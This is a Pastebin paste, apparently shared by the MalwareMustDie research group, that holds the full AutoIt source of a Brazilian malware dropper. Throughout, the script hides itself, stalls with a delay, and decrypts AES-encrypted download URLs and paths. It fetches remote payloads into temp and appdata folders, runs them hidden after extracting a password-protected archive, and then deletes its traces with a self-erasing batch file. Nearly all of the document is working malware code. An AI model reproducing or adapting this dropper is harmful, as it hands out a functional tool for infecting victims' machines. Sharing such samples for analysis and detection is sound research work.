daily pastebin goal
9%
SHARE
TWEET

Brazil AutoIt Malware - Dropper & Shellexec's

MalwareMustDie Jan 29th, 2016 (edited) 541 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Brazil AutoIt Malware - Dropper & Shellexec
  2. // #MalwareMustDie
  3.  
  4. Opt("TrayIconHide", 1)
  5. Global $hmutex
  6. Local $closehandle
  7. If createmutex("1iu1gx6wtf8XX8Qgs23WglF7pHVE7", $hmutex) Then
  8.     Sleep(0)
  9. Else
  10.     $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
  11.     onautoitexit()
  12.     Exit
  13. EndIf
  14. $init = TimerInit()
  15. While 1
  16.     Sleep(250)
  17.     $diff = TimerDiff($init)
  18.     If $diff / 1000 >= 25 Then
  19.         Sleep(0)
  20.         ExitLoop
  21.     EndIf
  22. WEnd
  23. Local $key = "1iu1gx6wtf8XX8Qgs23WglF7pHVE7"
  24. Local $lk = "334865BC36520346E0C1E1E80E851C9C85E28EAFDF2ED9C435EE1DB8659FB331"
  25. Local $fk = "7F526C99C294202AAD308A719AE29C93ABC72DC4A3DACE0C5A5AA8B2C5F69F37BE5684BEABE0EC9D6C66552570142913"
  26. Local $pass = "102030as"
  27. Local $s121 = "V0jB3Lk1S0ohgZYQrMl4pj"
  28. Local $vrtmp = ""
  29. Dim $base[4]
  30. Dim $array[7]
  31. $array[0] = "DD5AA5D0CC90E3A5093C88EE117132A1"
  32. $array[1] = "BCDA98C9F0011641ABD2BF11F2AC4587"
  33. $array[2] = "1F2F3D08ADA1FB0214BE2862C3ADE4AD"
  34. $array[3] = "AF94BB46CE3C9472E13AA925608FC37F"
  35. $array[4] = " *.mp4"
  36. $array[5] = "21CF70074AE1586E22D93C743A4CF40E"
  37. $array[6] = "93BE9C9A468F5C4543C1ED8CAB332A5FE3C001E933669C7D4BD959A2196637CC"
  38. Dim $fl[2]
  39. $fl[0] = "1DC242A0B18F861AD153F4903CB6403A"
  40. $fl[1] = "ACC16D423118CEA4717FA852B1EA3E3C"
  41. Dim $str1[7]
  42.  
  43. Func createmutex($mutex, ByRef $hmutex)
  44.     Dim $error_already_exists = 183
  45.     Dim $lasterror, $closehandle
  46.     Dim $retval
  47.     $hmutex = DllCall("kernel32.dll", "long", "CreateMutexA", "ptr", 0, "int", 1, "str", $mutex)
  48.     $lasterror = DllCall("kernel32.dll", "long", "GetLastError")
  49.     If $lasterror[0] = $error_already_exists Then
  50.         $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
  51.         $retval = 0
  52.     Else
  53.         $retval = 1
  54.     EndIf
  55.     Return $retval
  56. EndFunc
  57.  
  58. Func onautoitexit()
  59.     Dim $releasemutex, $closehandle
  60.     If IsArray($hmutex) Then
  61.         $releasemutex = DllCall("kernel32.dll", "int", "ReleaseMutex", "long", $hmutex[0])
  62.         $closehandle = DllCall("kernel32.dll", "int", "CloseHandle", "long", $hmutex[0])
  63.     EndIf
  64. EndFunc
  65.  
  66. Func ext($n)
  67.     Dim $nm
  68.     Dim $arext[3]
  69.     $arext[0] = "C05D7B097FE50E38BEBADAD08D7C6E9A"
  70.     $arext[1] = "AFCFA0ADFA04EA6120BFAEB086014AE9"
  71.     $arext[2] = 1899 - 1899 & "x"
  72.     Select
  73.         Case $n = 1
  74.             $nm = strcrpt(False, ext(3) & $arext[0], $key)
  75.             Return $nm
  76.         Case $n = 2
  77.             $nm = strcrpt(False, ext(3) & $arext[1], $key)
  78.             Return $nm
  79.         Case $n = 3
  80.             $nm = $arext[2]
  81.             Return $nm
  82.     EndSelect
  83. EndFunc
  84.  
  85. Func nmfl($v, $nmex, $qtd)
  86.     Dim $name
  87.     Dim $ext
  88.     For $i = 0 To $qtd
  89.         $name = $name & Chr(Random(Asc("a"), Asc("z"), 6))
  90.     Next
  91.     If $v = 1 Then
  92.         $ext = ext($nmex)
  93.         Return $name & $ext
  94.     Else
  95.         Return $name
  96.     EndIf
  97. EndFunc
  98.  
  99. Func dow($lk, $dr, $fl, $nm)
  100.     $base[$nm] = $dr & $fl
  101.     DirCreate($dr)
  102.     If NOT FileExists($dr & $fl) Then
  103.         InetGet($lk, $dr & $fl)
  104.     EndIf
  105. EndFunc
  106.  
  107. Func sh($infl, $prm)
  108.     If FileExists($infl) Then
  109.         ShellExecute($infl, $prm, "", "open", @SW_HIDE)
  110.     EndIf
  111. EndFunc
  112.  
  113. Func gtdir($sfilepath)
  114.     If NOT IsString($sfilepath) Then
  115.         Return SetError(1, 0, -1)
  116.     EndIf
  117.     Local $filedir = StringRegExpReplace($sfilepath, "\\[^\\]*$", "")
  118.     Return $filedir
  119. EndFunc
  120.  
  121. Func un()
  122.     Local $srbt = @TempDir & nmfl(0, 0, 8) & ".bat"
  123.     Local $hrbt = FileOpen($srbt, 2)
  124.     FileWrite($hrbt, ":start" & @CRLF & 'del "' & @AutoItExe & '"' & @CRLF & 'IF EXIST "' & @AutoItExe & '" goto start' & @CRLF & 'del "' & $srbt & '"')
  125.     FileClose($hrbt)
  126.     Run($srbt, "", @SW_HIDE)
  127. EndFunc
  128.  
  129. Func strcrpt($bencrypt, $sdata, $spassword)
  130.     _crypt_startup()
  131.     Local $sreturn = ""
  132.     If $bencrypt Then
  133.         $sreturn = _crypt_encryptdata($sdata, $spassword, $calg_aes_256)
  134.     Else
  135.         $sreturn = BinaryToString(_crypt_decryptdata($sdata, $spassword, $calg_aes_256))
  136.     EndIf
  137.     _crypt_shutdown()
  138.     Return $sreturn
  139. EndFunc
  140.  
  141. strcrpt
  142.  
  143. $tmp = @TempDir & "\" ;"
  144. $drmd = @AppDataDir & "\" :"
  145. $drcp = StringMid(@WindowsDir, 1, 2) & "\"
  146. $str1[0] = "A407B24B41A4AEA6C7DE8D84838569E8"
  147. $str1[1] = "35088C13149E3DAF5ED9EE207437B6F7"
  148. $str1[2] = "5F675C8B3973DD8C854DEDA25DB0F213"
  149. $str1[3] = "06F84E0A3F617F500F43A1661398D5DA"
  150. $str1[4] = "8956BA696DC2C905DA982296B1AD83C5"
  151. $str1[5] = "72DCE8B08F9EA9962B798A98251FDA8D"
  152. $str1[6] = "A0A960A1A6B5E25944CD3510DF58C38F"     ;"
  153. ShellExecute(strcrpt(False, ext(3) & $fk, $key), "", "", strcrpt(False, ext(3) & $str1[6], $s121), @SW_SHOW)
  154. dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[0], $key), $tmp, nmfl(1, 1, Random(5, 10)), 0)
  155. dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[1], $key), $drcp & strcrpt(False, ext(3) & $array[5], $key) & nmfl(0, 2, Random(3, 5)) & "\", nmfl(0, 2, Random(5, 10)), 1)
  156. Sleep(5000)
  157. $vrtmp = gtdir($base[1]) & "\"     ;"
  158. sh($base[0], strcrpt(False, ext(3) & $str1[0], $s121) & $base[1] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $vrtmp)
  159. Sleep(10000)
  160. If FileExists($vrtmp & strcrpt(False, ext(3) & $fl[0], $key)) Then
  161.     ShellExecute($vrtmp & strcrpt(False, ext(3) & $fl[0], $key))
  162. Else
  163.     un()
  164. EndIf
  165. dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[2], $key), $tmp, strcrpt(False, ext(3) & $fl[1], $key), 2)
  166. dow(strcrpt(False, ext(3) & $lk, $key) & strcrpt(False, ext(3) & $array[3], $key), $drmd & strcrpt(False, ext(3) & $array[6], $key), nmfl(0, 2, Random(5, 10)), 3)
  167. Sleep(5000)
  168. sh($base[0], strcrpt(False, ext(3) & $str1[1], $s121) & $base[3] & strcrpt(False, ext(3) & $str1[2], $s121) & strcrpt(False, ext(3) & $str1[3], $s121) & $pass & strcrpt(False, ext(3) & $str1[5], $s121) & $drmd & strcrpt(False, ext(3) & $array[6], $key) & $array[4] & strcrpt(False, ext(3) & $str1[4], $s121))
  169. Sleep(20000)
  170. While FileExists($base[0])
  171.     FileDelete($base[0])
  172. WEnd
  173. FileDelete($base[1])
  174. FileDelete($base[3])
  175. un()
RAW Paste Data
Top